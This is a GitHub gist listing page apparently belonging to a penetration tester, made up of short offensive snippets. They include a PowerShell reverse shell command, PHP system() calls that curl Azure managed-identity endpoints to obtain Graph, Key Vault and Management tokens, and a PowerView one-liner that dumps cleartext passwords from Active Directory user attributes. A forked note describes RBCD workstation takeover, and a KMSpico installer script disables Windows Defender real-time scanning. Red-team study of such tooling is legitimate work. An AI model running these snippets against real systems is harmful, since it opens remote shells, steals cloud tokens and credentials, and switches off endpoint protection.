
View ps-shell.ps1
iex (New-Object
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
View ConditonalAccess-Edge-UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
View Get-GraphToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
View Get-VaultToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
View Get-ManagementToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
View gist:334294bafa7bd83cc9625fc1cfe71a2a
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
C0axx /
Created September 25, 2022 00:17 — forked from mgeeky/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.


Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx ( on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object:

View sysmonconfig-export.xml
<Sysmon schemaversion="4.50">
<!-- This now also determines the file names of the files preserved (String) -->
<CheckRevocation />
<!-- Disables lookup behavior, default is True (Boolean) -->
<!-- Sets the name of the directory in the C:\ root where preserved files will be saved (String)-->
<CaptureClipboard />
<!--This enables capturing the Clipboard changes-->
View Install_kmspico.ps1
$KMSUrl = ""
$KMSDst = "C:\windows\temp\"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"
if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2019") {
Write-Host -ForegroundColor Green "[+] Temporarily disabling Windows Defender Real time Scanning"
Set-MpPreference -ExclusionPath C:\windows\temp
Set-MpPreference -DisableRealtimeMonitoring $true